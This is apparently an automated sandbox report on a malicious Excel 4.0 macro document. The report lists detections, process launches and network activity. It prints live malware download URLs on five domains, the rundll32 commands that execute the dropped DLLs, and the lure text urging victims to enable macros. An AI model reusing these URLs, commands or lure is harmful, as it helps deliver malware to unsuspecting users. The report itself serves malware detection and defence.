Loading ...

Play interactive tourEdit tour

Analysis Report document-933340782.xlsm

Overview

General Information

Sample Name:document-933340782.xlsm
Analysis ID:383151
MD5:766f5bb363db9a966b613a42a118798a
SHA1:57e67742fd7e7fa0badddca5b2cceb4cf09048a7
SHA256:9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2508 cmdline: rundll32 ..\iekdhfe.dsk,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2340 cmdline: rundll32 ..\iekdhfe.dsk1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2788 cmdline: rundll32 ..\iekdhfe.dsk2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2792 cmdline: rundll32 ..\iekdhfe.dsk3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2716 cmdline: rundll32 ..\iekdhfe.dsk4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://tienda.ventadigital.com.ar/ds/2803.gifAvira URL Cloud: Label: malware
Source: http://nellaimasthanbiryani.com/ds/2803.gifAvira URL Cloud: Label: malware
Source: http://thirdstringcalifornia.com/ds/2803.gifAvira URL Cloud: Label: malware
Source: http://holmesservices.mobiledevsite.co/ds/2803.gifAvira URL Cloud: Label: malware
Source: http://kristen.sbddev.com/ds/2803.gifAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: holmesservices.mobiledevsite.coVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: document-933340782.xlsmVirustotal: Detection: 37%Perma Link
Source: document-933340782.xlsmMetadefender: Detection: 16%Perma Link
Source: document-933340782.xlsmReversingLabs: Detection: 48%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: kristen.sbddev.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.23.112.133:80
Source: Joe Sandbox ViewIP Address: 143.95.33.96 143.95.33.96
Source: Joe Sandbox ViewIP Address: 66.36.231.40 66.36.231.40
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.pngJump to behavior
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kristen.sbddev.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tienda.ventadigital.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thirdstringcalifornia.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: holmesservices.mobiledevsite.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/2803.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nellaimasthanbiryani.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: kristen.sbddev.com
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableConnection: Keep-AliveX-Powered-By: PHP/7.2.34Content-Type: text/html; charset=UTF-8Content-Length: 97Content-Encoding: gzipVary: Accept-EncodingDate: Wed, 07 Apr 2021 08:46:55 GMTServer: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 b2 30 30 d6 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 8c 1f 10 3a 4f 00 00 00 Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)700KLS(O,V/QHPS(,V(N-*K-:O
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2119083483.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112907787.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2109469854.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106743511.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100624725.0000000001D77000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2100437884.0000000001B90000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 :: Once You have Enable Editing, please ell r, i m
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 12Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: document-933340782.xlsmInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: document-933340782.xlsmInitial sample: Sheet size: 53161
Source: rundll32.exe, 00000003.00000002.2118809970.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2112718551.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2108608259.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2106559021.0000000001B90000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal88.expl.evad.winXLSM@11/12@5/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$document-933340782.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCB2B.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: document-933340782.xlsmVirustotal: Detection: 37%
Source: document-933340782.xlsmMetadefender: Detection: 16%
Source: document-933340782.xlsmReversingLabs: Detection: 48%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iekdhfe.dsk4,DllRegisterServer
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/media/image4.png
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-933340782.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
document-933340782.xlsm37%VirustotalBrowse
document-933340782.xlsm19%MetadefenderBrowse
document-933340782.xlsm48%ReversingLabsDocument-Excel.Spyware.Ymacco

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
kristen.sbddev.com2%VirustotalBrowse
holmesservices.mobiledevsite.co7%VirustotalBrowse
tienda.ventadigital.com.ar4%VirustotalBrowse
nellaimasthanbiryani.com4%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://tienda.ventadigital.com.ar/ds/2803.gif100%Avira URL Cloudmalware
http://nellaimasthanbiryani.com/ds/2803.gif100%Avira URL Cloudmalware
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://thirdstringcalifornia.com/ds/2803.gif100%Avira URL Cloudmalware
http://holmesservices.mobiledevsite.co/ds/2803.gif100%Avira URL Cloudmalware
http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
http://kristen.sbddev.com/ds/2803.gif100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kristen.sbddev.com
50.23.112.133
truefalseunknown
holmesservices.mobiledevsite.co
103.68.166.129
truetrueunknown
tienda.ventadigital.com.ar
31.170.166.139
truefalseunknown
nellaimasthanbiryani.com
66.36.231.40
truefalseunknown
thirdstringcalifornia.com
143.95.33.96
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://tienda.ventadigital.com.ar/ds/2803.giftrue
    • Avira URL Cloud: malware
    unknown
    http://nellaimasthanbiryani.com/ds/2803.giftrue
    • Avira URL Cloud: malware
    unknown
    http://thirdstringcalifornia.com/ds/2803.giftrue
    • Avira URL Cloud: malware
    unknown
    http://holmesservices.mobiledevsite.co/ds/2803.giftrue
    • Avira URL Cloud: malware
    unknown
    http://kristen.sbddev.com/cgi-sys/suspendedpage.cgifalse
    • Avira URL Cloud: safe
    unknown
    http://kristen.sbddev.com/ds/2803.giftrue
    • Avira URL Cloud: malware
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
